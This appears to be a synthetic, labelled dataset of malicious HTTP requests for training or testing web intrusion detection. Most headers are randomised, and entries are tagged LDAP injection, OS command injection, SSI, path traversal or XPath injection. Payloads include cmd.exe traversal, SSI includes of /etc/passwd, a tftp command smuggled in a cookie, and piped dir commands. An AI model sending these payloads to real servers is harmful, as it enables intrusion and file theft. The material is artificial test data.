Via: HTTP/1.3 55.46.17.190, 1.8 165.175.26.205, FTP/0.6 www.xeee.html:06065
Transfer-Encoding: identity
Upgrade: ytc/5.0, mosem/3.9
Warning: 225 www.sthE.gif:19 "oyonins" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44262
Start - Id: 38750
class: LdapInjection
GET /xtmp_USz.jpg?csnhisil=%29++%28++++%7C++++%28+++cn%3D*o+%27brien*++++%29%28mail++%3D*o+++%27brien*+++%29+ HTTP/1.1
Host: 33.201.108.95
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 111.176.120.104
Cookie: s9orz8q7j2g= a;alaqRnornpt=vxi;;mbufneos2AnQlhj=16600;aSieiecizmex9i=?7de;lEtfrt5rzatas=ssystem]e;lmErbea8n34adnu=olBpvE
Cookie2: $Version="482"
Date: Wed, 10 May 06 14:09:38 CET
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: 100-continue
From: Dddcd@u4uew8d4.be
If-Modified-Since: Mon, 26 Jan 04 13:56:13 GMT
If-Unmodified-Since: Sat, 22 Apr 06 19:41:07 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Jan 04 16:28:32 UTC
Max-Forwards: 1554
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: Basic c250RzllOm42a3NuUmZp
Range: -6168,6-
Referer: http://www.oepo.fr/CKnunPor/mEnxuiel.asp
TE: deflate;q=0.3
Trailer: Upgrade
User-Agent: hI6edUnam (s6ivA5; n@OCZk0cX7)
UA-CPU: MIPS
UA-Disp: 8384,101,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 479x813
Via: 4.2 182.81.145.83
Transfer-Encoding: gzip
Upgrade: dEii/5.0, tdxit/7.6, ieed/6.6, lZat/6.5, ogl/2.1
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 205.210.81.15
X-Serial-Number: 91445747246733
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38750
Start - Id: 37975
class: LdapInjection
GET /itVSpNofEWSSX-Xlb7c9/D6epeo22alntnn4t8hhl/oGs7AF6vFYyTeg2lKst/UincrsaRwmoregpq1Unt/rrpg2HGy8jNaK/t18u2GXXcNA_lL/oZp5Nl3zqPX/hDMt4E4KO/t1uesee/41n53Y.mspx?R7spsystemm_ginputWstdin=%29++%28+%7C+++%28++++cn%3D*o+%27brien*+%29%28mail++++%3D*o+%27brien*++++%29++++&eutnfo=3712393&ol=Rnlcpht%27%28 HTTP/1.0
Host: 15.38.215.254
Connection: close
Accept: video/mpeg;q=0.5, audio/basic
Accept-Charset: windows-1251;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 23.116.147.228
Cookie: iwlrn=?hAri;tDmmua8gxm=fEea
Cookie2: $Version="5"
Date: Tue, 01 Sep 09 11:38:57 UTC
ETag: W/"f@fO0MyLgdLSoe3VulIJ"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 01 May 08 22:33:41 UTC
If-Unmodified-Since: Fri, 29 Sep 06 15:34:25 CET
If-Match: *
If-None-Match: *
If-Range: "6Ji04cuZ6Qc6RF.b"
Max-Forwards: 0
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest uri=/rzqu/hgeajer.gif
Range: 4893-,-7197
Referer: http://www.mtiggeer.net/iEdda/ncGXnieh/uoch0S.jpeg
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: mLmmffdmo (ek0EMW; 9A_hfkJp; 3JIhdq3Me)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8848x2681
Via: FTP/7.3 187.106.37.213, 3.6 www.eolDs.shtml:1
Transfer-Encoding: tNlu
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37975
Start - Id: 38740
class: LdapInjection
GET /AuhodwrcoocNme5/wmuQvxK1Y@kTGLt9/evB/rR7onoatefsne/1hhOrrisjh/weMlqanofn5pneIy/nnOwuep2rYKy0PeqC42/rrqiuebe.msf?frr3ugpnnkFi=ttM2%29%28%26%28objectClass+++%3D+sD1T*%29&oim8r3AnoRpwm2=27 HTTP/1.1
Host: www.t3hee.it:80
Connection: cxeiz
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: 5eeraBoe-iad, ei1hTe-odi, ed-Oe1ue;q=0.1
Cache-Control: hnohir1='tr'
Client-ip: 62.92.248.134
Cookie: iOs5G9=62936763;In1ps=2
Cookie2: $Version="510"
Date: Mon, 14 Feb 05 11:49:59 CET
ETag: W/"wYpnHj9DHaQ5NK@n"
Expect: Eirzruo
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 20 Oct 09 12:46:58 CET
If-Unmodified-Since: Sat, 29 Aug 09 18:11:27 GMT
If-Match: *
If-None-Match: "KJ@.FoCGdiCsCQfMtxT"
If-Range: Sun, 14 Sep 08 02:47:53 GMT
Max-Forwards: 22
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic eVRzbllhY2U6aXN0bw==
Authorization: Digest opaque="eJotl"
Range: 22791-
Referer: /3acyvw/rardt9h/hdee/1sajxg.gif
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/2.5 (X11; U; Open BSD i586 3.3; en-ao; rv:2.7.7) Gecko/23302041
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 708x0432
Via: FTP/9.8 www.cntw.js
Transfer-Encoding: diAUz; vhlate=t5Eee
Upgrade: tMn/9.4, ehno/4.3, ppp/7.3, 7emv/7.8, ieaEia/4.2
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 320181381664910
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38740
Start - Id: 44629
class: OsCommanding
POST /n7/rndo1dytr/i_M@J2/nJyyRse7ycI/gueertoiiit2/copy22YME/dnasioie5uam/koNeEeaeoEhoggddot/sBAipKBo/t11hUzU4PqpqA/eZNfQ1/39sHaduwjeegiDoeah.jpeg? HTTP/1.1
Content-Length: 297
Content-Language: sa,etda2ro
Content-Encoding: compress
Content-MD5: bmlvYWhpdGVoMXQ3TmpidA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 Oct 04 05:12:42 GMT
Host: www.rspv.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=7
Cookie: mer5ataoedtd7=18.234.0.160;tftp 192.168.10.33 test.txt;n8nzwe=vAleI
Date: Tue, 05 Jan 10 02:05:07 GMT
If-Modified-Since: Mon, 01 Nov 04 08:17:04 GMT
If-Match: *
If-None-Match: "9ZMVnCotSEiOub3-mP"
If-Range: *
Max-Forwards: 8
Pragma: no-cache
Authorization: NTLM bmxDb2Jpb2RDcHR3ZWtlQ2l5aWFlOUZlaWlhQzRvNUFkcHlhR3N4
Referer: http://www.ineepKdh.ch/rLean/rtmbI71/oscs0Dno/e4feuu.asmx
TE: trailers
Trailer: Date
User-Agent: Mozilla/8.3 (compatible; nlwsd2a6as; Unix; ntic; htt6)
Warning: 326 www.orghrBr.png "scaueat" 
X-Forwarded-For: 195.0.82.174

tdoewa=jFBn&s0ne= /pe&3dpora5l=67036&y8std=3833556&srno4eolOipk=e7Pw_SGEv&eas3ve=DstddeletecO&selRnf6eh=lo0anehri&jrsmtueaeASUeo=alsGiMteobjectseaH5n&eninhslaTutddSa=teqia6n'&NealelvnrgidlG=tliTneRspod&e5Owz8xtvoX=Wccpen9ur0fknhn&etrelee=aBPOb&acaltnbohypiein=utdievalia7eEeofd&et0u81ii5=lo/

End - Id: 44629
Start - Id: 44386
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 150.144.97.43
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-ce, koi8;q=0.0, iso-8859-15
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 25.151.126.170
Cookie: Levali3Azc07p=hxKyH;e7mtzdemeWthe=eXH5r;tleshh=dlTwhl;odstt6e=ruea;hBCq=nqrdEvf?psa6sw;aglsOseRtoe43=eWUe
Cookie2: $Version="962"
Date: Fri, 04 Nov 05 24:51:13 GMT
ETag: W/"obTbaYx6BR7gH4UQQTN9"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Mon, 23 Jun 08 11:44:47 UTC
If-Unmodified-Since: Mon, 03 Nov 08 02:01:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 17 Apr 10 24:21:18 CET
Max-Forwards: 61
MIME-Version: 1.4
Pragma: T='idt'
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Basic d2liZ2hhOm90Z3NmYWk=
Range: -843519
Referer: http://www.2nOoT.uk/ce6bah/omea/natbt.jsp
TE: trailers,chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: wV6f597K http://www.fnit.fr
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8335x3340
Via: HTTP/0.3 www.sln60tns.htm, HTTP/1.6 9.21.114.223:01012, 6.9 www.klSi.shtml
Transfer-Encoding: identity
Upgrade: sltIe/4.5, 7smi/8.6, fir/0.7
Warning: 551 92.44.38.235:34239 "tifgnertsiaoesxw" 
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44386
Start - Id: 40617
class: SSI
GET /nejSo_E/Ercpbap5UPgA/oKVOmXI.cgi?Hwjlewdo76anLna=ndyg4e4E&oohpc07rea52td=%3C%21--%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E HTTP/1.0
Host: www.fsthnhh.ch
Connection: close
Accept: */*;q=0.3
Accept-Charset: windows-1253;q=0.9, windows-1252;q=0.4
Accept-Encoding: gzip;q=0.7
Accept-Language: ste-cerlMgNh
Date: Wed, 24 Jun 09 10:52:43 CET
ETag: "BSYbTuX7wGz5Vkk"
If-Unmodified-Since: Sun, 14 Jun 09 10:05:00 GMT
If-Match: "gJn6iID_bB5P7NJr"
If-None-Match: "xfyccxVZX8PEhqBW"
MIME-Version: 5.0
Pragma: Enhe='phibcAec'
Authorization: ipAh lmohRey=elhu
Referer: /qan2looo/tsatb7og/iUcun/uihd.fgf
TE: deflate
User-Agent: rqoEI (wKE0gljqb; cMS0otr; ro74aU; tGi2NjF7Q; iUTwiuMw)
Via: FTP/1.3 7.4.108.62
Upgrade: eItzhe/6.5, bifw/0.8, 2hwep/5.5, nRdrN/1.5, ncnna/4.9
Warning: 308 68.164.17.248 "itScteuheeanafg" 
X-Serial-Number: 5234187897202701

null

End - Id: 40617
Start - Id: 46198
class: PathTransversal
GET /f1DoOqtvdocumentkbody/D_lE2n/b@KdZ6IJvp/yct2t/yUahFllxsz5RKSYjt/seAVboot.iniX@rcp94cmdr/sbs8nieieuc/Zshutdownwpsq1JrZMsock_stream3d/oea6whos.php?clttinkp9u=group+bysDoia%7EeaeqP&oKOW7=pfPYT4VRs0j&YaYtKskdelete=e%3A%2F.htaccess%7E&zoo=4emhle1otqrms&9pueijnn=%5Cohssvarlsb%25u4&sZfBRswtmpgSip=naasHseeeD&SeM7LBbinopt_3=Wwngtlyexsl%2Fi&IK0=nevuEaroAlNme&ttEw=af5els&nerea7h=2269&WdO9G98e=47485 HTTP/1.1
Host: 244.251.13.13:417
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.7, gzip, deflate;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 250.173.5.46
Cookie: nossjso6lwpuBs=4221466;fEUtJEFtmpLE=350687;drthy=ts1drp
Cookie2: $Version="43"
Date: Sat, 19 Jun 04 10:18:52 CET
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: sloo@sd406oko.ch
If-Modified-Since: Thu, 31 Jul 08 08:55:47 GMT
If-Unmodified-Since: Fri, 20 Feb 09 21:16:22 UTC
If-Match: "GT6rFwb8xEhzB6t"
If-None-Match: *
If-Range: Sun, 06 Nov 05 19:12:52 GMT
Max-Forwards: 2600
MIME-Version: 1.0
Pragma: jba='f'
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: NTLM c2Vybk90bm5paHRhbGoyZW5lcnNiUnJjZ2VkYXBkZXU=
Range: 3-60707,6378-,-00133
Referer: /ltRnt.avi
TE: trailers,trailers,chunked;q=0.8
Trailer: Accept
User-Agent: Mozilla/7.3 (X11; U; Linux i586 9.1; x4-ye; rv:1.0.9) Gecko/78482237
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 939x7286
Via: FTP/0.8 214.77.125.123:174, 6.5 www.hehdf.tiff:6177
Transfer-Encoding: deflate
Upgrade: eesinn/1.0, mc0b/6.6, eaa9an/7.8, olCrho/0.4, dhbfna/5.5
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 4158799
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46198
Start - Id: 48730
class: XPathInjection
GET /cA/dohHoeitnihlHorEed/8stl6ywn/iu2nttpEehRet/reTe/etjSAxgMlu7P/tb3dK49PBKI.nsf?LMh@AJb@M1=smhatcyn2&MUqfrom=econnect9%5De4m&hnx=eftd&TiS5w=bts2erUededd6mnwi&rheii5otsHdsef=s&dulouolho6eufui=%28i++%3C++++count%28odthe%2Fchild%3A%3Atext%28%29%29+and+++j+%3C+++count%28il3d%2Fchild%3A%3Acomment%28%29%29+++and+++k+%3C+++count%28tensks%2Fchild%3A%3A*%29+++++%29&Qob63LQ=T79hd6&n9ltaya=ssa%3Dc&k0cNnmpo=%7CandtYtkf9op&ylieinnoY=etarmhwoi7tpsr&nnHaooliuges4c=o%3Ae&emtdeda=kkstyleld3malm0o7%3D%3Co+e&tmmduh=2099210 HTTP/1.0
Host: 52.110.47.227
Connection: nh9nah1
Accept: video/mpeg, audio/basic;q=0.2, audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 86.22.3.99
Cookie: oritote425h=9PK;izTtet=nml;copya >;@IJf7-_2ZMFE=ue;divE.N=ia3pnntn2qs;nua=Nve%h =G;sRtned=etle8m
Cookie2: $Version="582"
Date: Fri, 15 Jun 07 02:21:59 GMT
ETag: "A11-an71voh3oukzw"
Expect: thslw=abtirt;neba
From: wdlEt@aLnyEae.st
If-Modified-Since: Thu, 27 Jul 06 18:32:52 GMT
If-Unmodified-Since: Fri, 09 Apr 10 21:44:52 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 25 Mar 08 18:47:01 CET
Max-Forwards: 8320
Pragma: gsr0ue='keo'
Proxy-Authorization: NTLM dTZld210U2hpaWhzaFNhdHVyZWRvcmNlZnBxQTNydzJlc3RyYW1o
Authorization: Basic b2xybmFqOnFlNmF5
Range: 54972-
Referer: /hmslR/Aiec8t/jEco/3ntii2rr.zip
TE: trailers
Trailer: Upgrade
User-Agent: e5slaeeloaerdmuiev
UA-CPU: Sparc
UA-Disp: 0723,340,16
UA-OS: Windows 98
UA-Pixels: 0339x4942
Via: HTTP/8.1 www.Tpce.tiff, 9.7 www.aShah.html, 5.8 202.238.250.241
Transfer-Encoding: gzip
Upgrade: siR/5.1
Warning: 300 www.HoEr1Dn.gif "tteseoapsoeca" 
X-Forwarded-For: 56.221.27.196
X-Serial-Number: 3865979
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48730
Start - Id: 39550
class: SSI
POST /ojNsD3stdin8vllocationU8/niatvrohE/hfZ/y7uUqPqA2A8pv.swf? HTTP/1.1
Content-Length: 219
Content-Language: tswh
Content-Encoding: gzip
Content-Location: http://www.oenebaE.ch/idteiaiv/uiorgu/teasrje/tmisPa.pl
Content-MD5: b284bWRuaWVjaWVzcmFpZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Jul 09 09:52:06 UTC
Last-Modified: Thu, 21 Sep 06 14:17:28 GMT
Host: www.veuqlc.com:80
Connection: close
Accept: audio/*;q=0.9, video/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 94.165.84.44
Cookie: oed6nHsCSa=%doirlue>gbgsoundy;rmAhtP2eiplE5ds=t;qse
Cookie2: $Version="6"
Date: Sun, 28 May 06 17:04:59 CET
ETag: "jH5nNBEG4Q3ydGqFcPDi"
Expect: 100-continue
From: resjr@ovdSf3ie7i.biz
If-Modified-Since: Thu, 28 Jul 05 18:18:03 CET
If-Unmodified-Since: Sun, 10 Jul 05 16:59:49 GMT
If-Match: *
If-None-Match: *
If-Range: "3Z7-3ynm7.5r@1hq"
Max-Forwards: 360
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: tennta dsi10Hd=atah9ert
Authorization: rfejui tecolboq=iNrss8tl
Referer: /kIe6qt/rrzthrse.swf
TE: trailers
Trailer: Accept-Encoding
User-Agent: esJMmD http://www.2dt0onad.gov
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color32
Via: FTP/7.1 94.79.90.11:60453, 3.6 www.t3uTwn.png:87, HTTP/3.8 40.112.111.113
Transfer-Encoding: gzip
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 538 www.8nsfo.jpg "eTpenvt3cmheHz" "Sun, 09 Nov 08 07:42:25 CET"
X-Serial-Number: 11507528452920010282
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uJkO2Q=+sunnhoj&8q3h5wo=<!--     #include    virtual="/etc/passwd"     -->&id3ennoosExioic=72872&vrr=sElhq5 pghb|uaa s hn&q4fisnsu=056436&ulgntpmoAi=16905297&Vshutdown.fBxF2WU=h&r9fAiencnrD5=516973

End - Id: 39550
Start - Id: 35985
class: PathTransversal
POST /adminiIW5/stwy/tyUzSr1xEKcQIPRlY/sQ-fQ.fTLOE/tstmecrlwio/8gfdvbetweenEhttpsVHhN/nlzG5Gs/cxt3maeS/sS1.jsp? HTTP/1.0
Content-Length: 238
Content-Language: ie3
Content-Encoding: compress
Content-Location: http://www.aiaZi3tc.be/9slvls/nIfI/zaChba7.php3
Content-MD5: Y3NpbEZ3Y29haWUxZW11Uw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 May 09 14:46:27 UTC
Last-Modified: Thu, 03 May 07 19:41:11 UTC
Host: www.wgslpaayw.net
Connection: keep-alive
Accept: text/*, image/*;q=0.9
Accept-Charset: x-mac-ce;q=0.7
Accept-Encoding: deflate, gzip;q=0.3, gzip;q=0.3, compress;q=0.3
Accept-Language: r-sesuea;q=0.3, tm-dcz, os-arn3od
Cache-Control: no-store
Client-ip: 110.8.182.127
Cookie2: $Version="01"
Date: Wed, 03 Mar 04 12:59:56 CET
ETag: "mF.PGpo8XgOKlZ_"
Expect: neunMot=rOmfelow;ien9s2e
If-Modified-Since: Mon, 13 Dec 04 10:30:50 GMT
If-Unmodified-Since: Mon, 27 Sep 04 07:06:34 GMT
If-None-Match: "iKir9LhZTNKF8Wn"
If-Range: Thu, 03 Dec 09 16:53:05 GMT
Max-Forwards: 9838
Pragma: no-cache
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Referer: /xsq4tse/wfrroii/odE1eaba.conf
TE: chunked;q=0.2
User-Agent: cMDEydALd http://www.l3Loatd2.it
Transfer-Encoding: deflate
Upgrade: Oserl/7.4, qevnuc/3.1, 3mk6/5.1
X-Forwarded-For: 59.156.7.223

bYbody9kfeboot.ini_Ob=t&@elocationFprocessing-instructionH=eQ-vWVUV3K&dwooch9etsiiM=../../../WINDOWS/autoexec.bat&ri9e1srt1w=oFJs5B6&hepeh=02498&breaUu9pneet=budqCVnG&e8n3rdRolaio=1545535&ott=Stl3ndorsrywqdepr&Agcath7_fI=tdwhtd)

End - Id: 35985
Start - Id: 44694
class: PathTransversal
POST /gg0telnet6zHgYg4x/iZMejZVORQLfS_K/fxet1i/m9MQ/mK2UciDjdiv1.r/bS.T@EjmO.Ual4K4JVOk/LeeoamhpoeypgcaheRw/aYJm0z.cgi? HTTP/1.0
Content-Length: 216
Content-Language: engs,4sts,oli
Content-Encoding: compress
Content-Location: http://peoa.st/jBktme/klueh/oegrcee/eIEk/tiocwA.asp
Content-MD5: Y2RocmhvNHJlc2lsRW5lMg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Sep 06 06:10:41 UTC
Last-Modified: Sat, 15 Jan 05 18:45:07 CET
Host: 212.60.252.15:80
Connection: rmte
Accept: text/plain;q=0.1
Accept-Charset: windows-1258;q=0.5, iso-8859-6;q=0.4, iso-8859-2, utf-8
Accept-Encoding: compress;q=0.4, deflate;q=0.4, compress;q=0.6, deflate, compress
Accept-Language: stxhah-ymesund, nuYttL-Seelxa;q=0.6, n-azvvS
Cache-Control: no-store
Client-ip: 219.190.204.229
Cookie: onytsai7iet=l;09ukQ4NV7s2=3465;inorFnh4=3;iw6amgoaEheytn=r9tecsaKsrlIzF
Cookie2: $Version="90"
Date: Wed, 06 May 09 02:53:13 CET
ETag: "RHf0qrb9mHL2t__f2YB"
Expect: saene=nf9tcCm
From: nC0otao@cuVsd.gov
If-Modified-Since: Fri, 02 Jul 04 24:37:04 CET
If-Unmodified-Since: Tue, 01 Dec 09 16:18:34 GMT
If-Match: *
If-None-Match: "SxwS.Y-e6CXloS1Q"
If-Range: *
Max-Forwards: 48
Pragma: hs='tyen'
Authorization: NTLM OW5sczlldGxBaGYzY2luZWJmc3ZmZXRvcnl0bWRlMW9oeWE=
Range: 2168-,8-1607,73-
Referer: /estyjacL.cfm
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: e4kooFSe (4kV43Tjpw)
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 136x0173
Via: 3.1 www.etw4Mrsh.htm, nvgao/4.9 www.fofr9w1n.gif:971, 5.4 www.anRr5.htm
Transfer-Encoding: deflate
Upgrade: eeew/6.4, 8ei/8.8, dN4/7.3, mAm9/3.5
Warning: 629 183.2.112.153 "z4na" "Sun, 11 Oct 09 15:34:16 GMT"
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: --------------

e2mkncsn=oaccess_logI&teu=6020627&NAeUslnF=tud&iuck6ur3=nfe&e0tmubeieiu=aurt(&aEht=0785766&formMim=0162910&eegyoci=taY_Qg&GlZP04h9=5Y?&t4casgsennk=6aQta ae7&aoi3bunia=geetp&uz=./.././.././.././../

End - Id: 44694
Start - Id: 44860
class: PathTransversal
GET /wroeImadaipo3/n0/uJjp9amolk-zw5z.png?mtrch=1281973&i1pwuS2gm0dn=429&wGUXIA=7440572&arenlnnu6fnewu=tztnaUamnp6fp&eeeiiyx1tHe=rAohn&tttDats=file%3A%2F%2F%2Fp%3A%2Fta9ra%2FesAt%2FdvhsTer5.xml&duxm0weE=te%2F%24WleAstylerrad+Zdni&E8VQA=1568642&neela=%3Cn&ntucdePpei0IwwN=n8Ha+%7Clnacceptsock_streamiplrdivlr%3F&arbetlbN=access_logzh%2Bs&ld1=eGf HTTP/1.0
Host: www.ifctqWc1.it
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Sestee59-elll8c2, R-tslm3r, e5RyteGg-dk, sha-r9Deer;q=0.4, eo3-h6msX
Cache-Control: no-store
Client-ip: 31.199.198.5
Cookie: 5jTEmt@-KyKinput=8ehe97
Cookie2: $Version="27"
Date: Tue, 05 Jan 10 12:59:12 UTC
ETag: W/"2Hr_1mB_sXpKsq.@5EV"
Expect: 100-continue
From: netotmi@oanhTettwr.cz
If-Modified-Since: Wed, 25 Feb 09 05:14:43 GMT
If-Unmodified-Since: Mon, 11 Feb 08 18:20:34 UTC
If-Match: *
If-None-Match: *
If-Range: "Gp7y_H44dVZHIAb"
Max-Forwards: 6499
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic dWRlNmk6eG1ocHA4Zjk=
Authorization: NTLM bG9QZGZOZW4zNmRjZXJlZWVpZWpmc2JnaWFhbmdhcnRvUm9ldA==
Range: 3752-,303-8,-33345
Referer: http://dyoc.de/rFsa/cn79vzc/8reb.dll
TE: trailers,trailers,gzip;q=0.8
Trailer: Date
User-Agent: Mozilla/7.5 (Machintosh; U; Mac OS X 7.0; sL-rr; rv:0.7.8) Gecko/87853270
UA-CPU: StrongARM
UA-Disp: 280,070,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 458x842
Via: 8.2 224.145.89.72, 4.4 www.hlijaAhh.htm, 5.1 247.212.47.152
Transfer-Encoding: compress
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 565 www.9hmbio.js "egRIp9dtnpPtahcsat" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 14283566548757550982
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44860
Start - Id: 42898
class: OsCommanding
GET /yrLobYR88Lv.WLFLBN8A/ncy_/aHDe1yKE@P7G/Asuwea/tSJ71nCnGZIn/hdkGL/wV/lixDqatd/jfQ54p4U4DOY-.e90/yXyyZPL-dt@/5r3aU-/uoue.swf?trdxNrxcys=so&MTfqEpPJY3=nrXW6KG&f_0zMbu7y__B=ssrbgaa&m0nlqt=2240092&dloBt=1448&bthis9=126&yduh=dOoDfsF3&rr1iaton=70302&pclAuxlshHao=894355344&nivhbg=ch.w&oi=a%3Cmpaqs&isemRnqd=etrfK&Ipyz4.9KW=552&6hasstv=%7C++dir+..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+++++%2C HTTP/1.0
Host: 229.92.28.83
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, compress;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 131.10.230.51
Cookie: oR=a y3r)aoooerwj$t1v
Cookie2: $Version="7"
Date: Thu, 21 Feb 08 22:22:41 UTC
ETag: W/"Yc0sSUd-TLA7bjZ"
Expect: torrt
From: Osrmorba@tAdnt9t.st
If-Unmodified-Since: Fri, 20 Jun 08 02:11:24 GMT
If-Match: "zoqCVLwx.m@sLsjAA"
If-None-Match: *
Max-Forwards: 0
Pragma: no-cache
Proxy-Authorization: tnjdb exudt=knpuX
Authorization: trscen n7thehl=sjeDAir
Referer: http://www.leyuca.fr/enin/veaet/9fnGs.cfm
TE: trailers,trailers,trailers
User-Agent: Mozilla/6.6 (Machintosh; U; PPC Mac OS X 2.8; tl-hm; rv:4.7.4) Gecko/02854783
UA-Disp: 2272,6803,16
UA-Color: color32
Via: 7.3 www.wdgAsi.js, 9.5 32.49.91.171
Transfer-Encoding: identity
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42898
Start - Id: 36669
class: OsCommanding
POST /aUFlS%u/eye6latzunkmiv.tiff? HTTP/1.0
Content-Length: 6
Content-Language: a,dllws54l,9ej1
Content-Encoding: gzip
Content-Location: /yutrntiu/8duHp.swf
Content-MD5: Y215MmllZmxmdWFTd2RmcA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jun 07 24:44:10 UTC
Last-Modified: Tue, 29 Sep 09 01:33:52 CET
Host: 218.119.102.106
Connection: keep-alive
Accept: application/*, application/*;q=0.6, audio/*;q=0.8
Accept-Charset: euc-jp;q=0.4, iso-8859-15, macintosh;q=0.2, x-mac-japanese;q=0.3
Accept-Encoding: 
Accept-Language: r-swd4re;q=0.2, p-6t
Cache-Control: no-cache
Cookie: 0liTjxdXEtmp=5275;rdx=tt5bi;xinputaqxi=093;300a=98.58.89.80    |  dir;dbFOT=mH-t(s;uuagejtis=)otYigeehtg
Date: Tue, 16 Dec 08 24:29:30 GMT
ETag: "_h75_A_MxrNtBjbV6"
If-Unmodified-Since: Sat, 01 May 10 22:01:52 GMT
If-Match: *
If-Range: *
Pragma: u9lZ=y1Le0r
Authorization: beeC nsarE=eEhosac
Range: 894-93,0-8
Referer: /notd1g7/itGole/ra9xeRt.php3
TE: trailers,trailers
Trailer: Authorization
User-Agent: suqnl (fokw6QPZ; rA8Tzn6C3B)
UA-OS: Windows 98
UA-Pixels: 646x0274
Transfer-Encoding: gzip
Warning: 695 145.182.107.14 "YeKpi" 
----: ----------------------------------

i9wn=h

End - Id: 36669
Start - Id: 49597
class: XPathInjection
